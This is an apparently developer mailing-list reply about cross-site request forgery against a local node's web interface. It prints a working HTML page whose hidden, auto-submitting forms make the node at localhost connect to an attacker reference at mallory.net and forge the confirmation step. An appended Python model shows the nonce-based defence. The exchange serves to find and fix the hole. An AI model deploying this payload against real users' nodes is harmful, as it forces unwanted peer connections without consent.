Matthew Toseland wrote:
> So not only can it not read a frame from a different domain, it can't
> open one in a hidden iframe and then submit it either?

The script doesn't need to submit the same confirmation returned by the 
server - it can just fake it like it did with the original form.

Something like this:

...
<script type='text/javascript'>
function submitFirst() {
        document.forms['form'].submit();
        window.setTimeout ('submitSecond()', 2000);
}
function submitSecond() {
        document.forms['confirmation'].submit();
}
</script>
</head>
<body onload='submitFirst()'>
<form name='form' action='http://localhost:8888/darknet/' method='post' 
enctype='multipart/form-data' target='hidden_iframe'>
<input name='url' type='hidden' value='http://mallory.net/ref.txt' />
<input name='connect' type='hidden' value='Connect' />
</form>
<form name='confirmation' action='http://localhost:8888/confirm/' 
method='post' enctype='multipart/form-data' target='hidden_iframe'>
<input name='areYouSure' type='hidden' value='Yes' />
</form>
...

As far as I can see, the only way to prevent this is to put a nonce in a 
hidden field in the form. If the nonce doesn't match when the form is 
submitted, ignore the request and maybe alert the user.

Cheers,
Michael
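
The nonce check described above, as an added example that is not part of the original mail or of Freenet's code: a toy model of the two-step connect/confirm flow where every form carries a per-session nonce in a hidden field (`csrfNonce` is an assumed name), and both handlers ignore and log any POST whose nonce is missing or wrong. The cross-site page can still submit the forms, but because it cannot read the node's page, it cannot learn the nonce, so its two forged POSTs are dropped while the node's own form still works.

```python
import hmac
import secrets


class NodeSession:
    """Constructed model of the /darknet/ and /confirm/ handlers with a
    per-session CSRF nonce; assumption, not the real node's implementation."""

    def __init__(self):
        self.nonce = secrets.token_hex(16)  # one unguessable nonce per session
        self.pending = None                 # URL waiting for confirmation
        self.connected = []                 # accepted peer references
        self.alerts = []                    # what the user would be warned about

    def render_form(self):
        # Fields the node's own page embeds; a cross-origin page cannot read them.
        return {"url": "", "connect": "Connect", "csrfNonce": self.nonce}

    def _nonce_ok(self, fields, handler):
        # Constant-time compare; "" (field absent) and wrong values both fail.
        if hmac.compare_digest(fields.get("csrfNonce", ""), self.nonce):
            return True
        self.alerts.append(f"{handler}: missing or wrong nonce, request ignored")
        return False

    def post_darknet(self, fields):
        if not self._nonce_ok(fields, "/darknet/"):
            return "ignored"
        self.pending = fields["url"]
        return "confirm?"

    def post_confirm(self, fields):
        if not self._nonce_ok(fields, "/confirm/"):
            return "ignored"
        if fields.get("areYouSure") != "Yes" or self.pending is None:
            self.pending = None
            return "cancelled"
        self.connected.append(self.pending)
        self.pending = None
        return "connected"


def forged_sequence(session):
    # The two POSTs exactly as the attacker's hidden forms above would send them.
    first = session.post_darknet({"url": "http://mallory.net/ref.txt", "connect": "Connect"})
    second = session.post_confirm({"areYouSure": "Yes"})
    return first, second


def legitimate_sequence(session, url):
    # The node's own page: both submissions carry the nonce it was served.
    form = session.render_form()
    first = session.post_darknet({**form, "url": url})
    second = session.post_confirm({"areYouSure": "Yes", "csrfNonce": form["csrfNonce"]})
    return first, second
```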
